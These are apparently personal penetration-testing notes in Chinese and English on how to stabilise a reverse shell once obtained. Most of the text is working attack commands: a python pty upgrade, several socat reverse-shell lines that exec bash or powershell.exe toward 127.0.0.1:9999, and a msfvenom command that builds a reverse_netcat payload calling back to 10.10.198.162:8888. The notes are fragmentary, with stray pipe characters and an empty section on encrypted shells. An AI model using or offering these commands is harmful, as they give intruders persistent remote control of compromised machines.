what the shell
反弹shell拿到后怎么稳固呢
python3 -c 'import pty;pty.spawn("/bin/bash")' |
socat 反弹shell
socat TCP:127.0.0.1:9999 EXEC:"bash -li"
Windows上
socat TCP:127.0.0.1:9999 EXEC:powershell.exe,pipes
socat TCP:127.0.0.1:9999 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
加密shell
|
msf
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.198.162 lport=8888 R